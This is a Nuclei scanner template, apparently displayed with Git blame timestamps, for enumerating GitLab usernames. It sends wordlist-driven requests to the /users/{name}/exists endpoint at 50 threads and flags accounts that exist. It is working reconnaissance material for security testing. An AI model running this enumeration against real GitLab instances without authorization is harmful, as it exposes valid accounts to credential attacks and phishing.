nuclei-templates/vulnerabilities/gitlab/gitlab-user-enumeration.yaml

41 lines
869 B
YAML
Raw Normal View History

2021-06-14 08:50:55 +00:00
id: gitlab-user-enumeration
2021-06-14 10:43:38 +00:00
info:
author: Suman_Kar
name: GitLab - User Enumeration
2021-06-14 08:50:55 +00:00
severity: info
2021-06-14 10:43:38 +00:00
tags: gitlab,enumeration,fuzz
2021-06-15 19:53:59 +00:00
# Username source - https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt
2021-06-14 10:43:38 +00:00
requests:
- payloads:
2021-06-15 19:53:59 +00:00
user: helpers/wordlists/user-list.txt
2021-06-14 08:50:55 +00:00
attack: sniper
2021-06-14 10:43:38 +00:00
threads: 50
2021-06-15 19:53:59 +00:00
2021-06-14 10:43:38 +00:00
raw:
- |
2021-06-15 19:53:59 +00:00
GET /users/{{user}}/exists HTTP/1.1
2021-06-14 10:43:38 +00:00
Host: {{Hostname}}
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
Connection: keep-alive
matchers-condition: and
matchers:
- type: regex
2021-06-14 08:50:55 +00:00
part: body
2021-06-14 10:43:38 +00:00
regex:
2021-06-14 08:50:55 +00:00
- "exists.*:true"
2021-06-14 10:43:38 +00:00
- type: status
status:
2021-06-15 19:53:59 +00:00
- 200
- type: word
words:
- "application/json"
part: header